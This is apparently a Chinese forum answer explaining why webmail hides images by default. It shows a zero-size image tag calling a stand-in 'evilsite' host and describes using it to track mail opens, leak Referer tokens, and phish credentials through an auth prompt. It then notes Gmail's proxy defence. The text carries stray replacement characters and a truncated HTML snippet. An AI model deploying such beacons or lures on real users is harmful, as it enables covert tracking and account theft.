站在黑客角度來給出答案����。
大多數(shù)專業(yè)郵箱都默認(rèn)不顯示圖片,因?yàn)椋?br/>
http://evilsite/hi.php width=0 height=0 />
看����,src的值可以不需要是真圖片����。
這樣可以隱蔽地得到郵件URL(即Referer����,即瀏覽器地址欄那個(gè)URL)。
有什么用呢����?
1. 郵件打開跟蹤:只要郵件被查看就會(huì)請(qǐng)求這個(gè)hi.php地址����,hi.php可以做好記錄,除了記錄是否被請(qǐng)求了����,還可記錄郵件URL、用戶瀏覽器User-Agent����、用戶IP地址等。這個(gè)可以做個(gè)郵件跟蹤系統(tǒng)了:)
有了這個(gè)����,根本不需要「已讀回執(zhí)」功能了����。
有了這個(gè)����,搞垃圾郵件群發(fā)的,各位腦補(bǔ)下����,他們會(huì)有多開心。
2. 某些手機(jī)端郵箱:傳統(tǒng)的WAP或APP(本質(zhì)是Web的情況)����,Referer可能會(huì)包括用戶身份token,這會(huì)導(dǎo)致身份token輕易泄露����,賬號(hào)被盜。
3. 有人用hi.php來玩釣魚攻擊:hi.php可以被設(shè)置需要Auth等認(rèn)證����,這時(shí)一查看郵箱就彈出一個(gè)Auth窗口,提醒輸入用戶名密碼����,只要場(chǎng)景設(shè)計(jì)好����,有一定概率����,用戶會(huì)被釣魚。
4. 確實(shí)����,圖片可以很好躲避基于文本的貝葉斯反垃圾機(jī)制。默認(rèn)屏蔽圖片����,「意外」屏蔽了這個(gè)眼不見心不煩的煩惱
就這么小的一個(gè)點(diǎn)����,這些年來一直出現(xiàn)各種對(duì)抗,出現(xiàn)個(gè)對(duì)抗又被修復(fù)����。什么是好郵箱?好郵箱就是這么小的一個(gè)點(diǎn)����,必須把控好安全與體驗(yàn)的那種平衡:)
目前Gmail采用的方式是用Google自己的服務(wù)器下載所有嵌入郵件的圖片����,之后在用戶打開郵件時(shí)使用服務(wù)器上的那份����。很安全,并且相對(duì)更User-friendly一些����。
